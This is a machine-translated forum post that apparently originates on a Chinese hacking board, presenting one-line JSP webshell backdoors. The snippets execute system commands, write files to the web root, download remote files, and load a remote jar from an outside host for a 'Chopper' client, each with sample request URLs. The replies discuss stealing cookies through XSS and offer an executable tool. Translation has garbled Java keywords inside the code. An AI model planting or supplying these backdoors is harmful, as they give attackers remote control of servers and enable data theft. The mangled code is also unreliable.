Denne artikkelen er en speilartikkel om maskinoversettelse, vennligst klikk her for å hoppe til originalartikkelen.

Utsikt: 14991|Svare: 7

[Sikkerhetsverktøy] Håndskrevet JSP-bakdør

[Kopier lenke]
Publisert på 02.01.2015 18:46:57 | | | |
Overført fra: http://p2j.cn/?p=1627
1. Utfør systemkommandoer:
Utfør systemkommandoer uten ekko:
<%Runtime.getRuntime().exec(request.getParameter("i"));%>
Forespørsel: http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls
Det vil ikke være noe ekko etter utførelsen, noe som er veldig praktisk for bounce-skall.
Det finnes ekko med passordverifisering:
<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();        int a = -1;        byte[] b = ny byte[2048];        out.print("<pre>");        mens((a=in.read(b))!=-1){ out.println(new String(b));        } out.print("</pre>");    }%>
Forespørsel: http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=023&i=ls

2. Koder strengen og skriv den til den angitte filen:
1:
<%new java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes());%>
Forespørsel: http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
Skriv til nettkatalogen:
<%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(request.getParameter("c").getBytes());%>
Forespørsel: http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
2:
<%new java.io.RandomAccessFile(request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
Forespørsel: http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
Skriv til nettkatalogen:
<%new java.io.RandomAccessFile(application.getRealPath("/")+"/"+request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
Forespørsel: http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
3: Last ned den eksterne filen (hvis du ikke bruker Apache IO Utils, kan du ikke konvertere inputstreamen til byte, så den er veldig lang...)
<% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream();    byte[] b = ny byte[1024];    java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream();    int a = -1;    mens ((a = in.read(b)) != -1) { baos.write(b, 0, a);    } ny java.io.FileOutputStream(request.getParameter("f")).write(baos.toByteArray()); %>
Forespørsel: http://localhost:8080/Shell/download.jsp?f=/Users/yz/wwwroot/1.png&u=http://www.baidu.com/img/bdlogo.png
Last ned til nettbanen:
<% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream();    byte[] b = ny byte[1024];    java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream();    int a = -1;    mens ((a = in.read(b)) != -1) { baos.write(b, 0, a);    } ny java.io.FileOutputStream(application.getRealPath("/")+"/"+ request.getParameter("f")).write(baos.toByteArray()); %>
Forespørsel: http://localhost:8080/Shell/download.jsp?f=1.png&u=http://www.baidu.com/img/bdlogo.png
Fire: Refleksjon kaller den ytre krukken, perfeksjoner bakdøren
Hvis du ikke liker at bakdørsfunksjonen ovenfor er for svak og utdatert, kan du prøve dette:
<%=Class.forName("Load",true,new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter("u"))})).getMethods()[0].invoke(null, new Object[]{ request.getParameterMap()})%>
Forespørsel: http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar&023=A

Kjøkkenkniv-tilkobling: http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar, passord 023.

Løsning:
Bruk refleksjon for å laste inn en ekstern jar i den nåværende applikasjonen, og refleksjon kjører resultatet av utdatabehandlingen. request.getParameterMap() inneholder alle de forespurte parameterne. Siden den eksterne jar-pakken lastes inn, må serveren kunne få tilgang til denne jar-adressen.




Foregående:Krisen bak TXT-tekstfilen
Neste:Java MD5-kryptering, Base64-kryptering og dekryptering Java kjører systemkommando-kildekode
Publisert på 02.01.2015 20:17:30 |
Nylig har du undersøkt jsp backdoor?
 Vert| Publisert på 02.01.2015 20:39:44 |
admin postet 2015-1-2015 20:17
Nylig har du undersøkt jsp backdoor?

Har du noen gang sett jsp i én setning? Jeg fant den, jeg studerte den ikke grundig, jeg forsto ikke xss, jeg fikk endelig informasjonskapslene i går, og jeg vet ikke hvordan jeg skal endre opplastingen av informasjonskapsler
Publisert på 02.01.2015 20:44:40 |
Delver_Si Publisert 2015-1-2 20:39
Har du noen gang sett jsp i én setning? Jeg fant den, jeg gravde ikke dypere, jeg forsto ikke xss, jeg fikk endelig kjeksene i går, jeg vet ikke hvordan jeg skal modifisere cookien...

Det vil ikke være mine informasjonskapsler som er stjålet med en personlig signaturfil,,,

Bruk Firefox sin HackBar-plugin
Publisert på 02.01.2015 20:48:57 |
Delver_Si Publisert 2015-1-2 20:39
Har du noen gang sett jsp i én setning? Jeg fant den, jeg gravde ikke dypere, jeg forsto ikke xss, jeg fikk endelig kjeksene i går, jeg vet ikke hvordan jeg skal modifisere cookien...

Ghost Brother Multifunksjonell Nettleser v1.0


鬼哥多功能浏览器v1.0.exe (72 KB, Antall nedlastinger: 7, Salgspris: 1 Korn MB)
 Vert| Publisert på 02.01.2015 20:57:50 |
Admin publisert 2015-01-2015 kl. 20:44
Det vil ikke være mine informasjonskapsler som er stjålet med en personlig signaturfil,,,

Bruk Firefox sin HackBar-plugin

I går var den ledige døren krampaktig, og jeg klarte ikke å koble til, og jeg kunne ikke komme inn i Firefox-butikken.
 Vert| Publisert på 02.01.2015 20:59:01 |
Admin publisert 2015-01-2015 kl. 20:44
Det vil ikke være mine informasjonskapsler som er stjålet med en personlig signaturfil,,,

Bruk Firefox sin HackBar-plugin

DZ har ikke dette smutthullet
Publisert på 02.01.2015 21:00:22 |
Delver_Si Publisert 2015-1-2 kl. 20:59
DZ har ikke dette smutthullet

Jeg vet ikke, du kan teste det, ikke ødelegg databasen min   

Vi bruker alle Tor Browser for å komme oss rundt veggen

Ansvarsfraskrivelse:
All programvare, programmeringsmateriell eller artikler publisert av Code Farmer Network er kun for lærings- og forskningsformål; Innholdet ovenfor skal ikke brukes til kommersielle eller ulovlige formål, ellers skal brukerne bære alle konsekvenser. Informasjonen på dette nettstedet kommer fra Internett, og opphavsrettstvister har ingenting med dette nettstedet å gjøre. Du må fullstendig slette innholdet ovenfor fra datamaskinen din innen 24 timer etter nedlasting. Hvis du liker programmet, vennligst støtt ekte programvare, kjøp registrering, og få bedre ekte tjenester. Hvis det foreligger noen krenkelse, vennligst kontakt oss på e-post.

Mail To:help@itsvse.com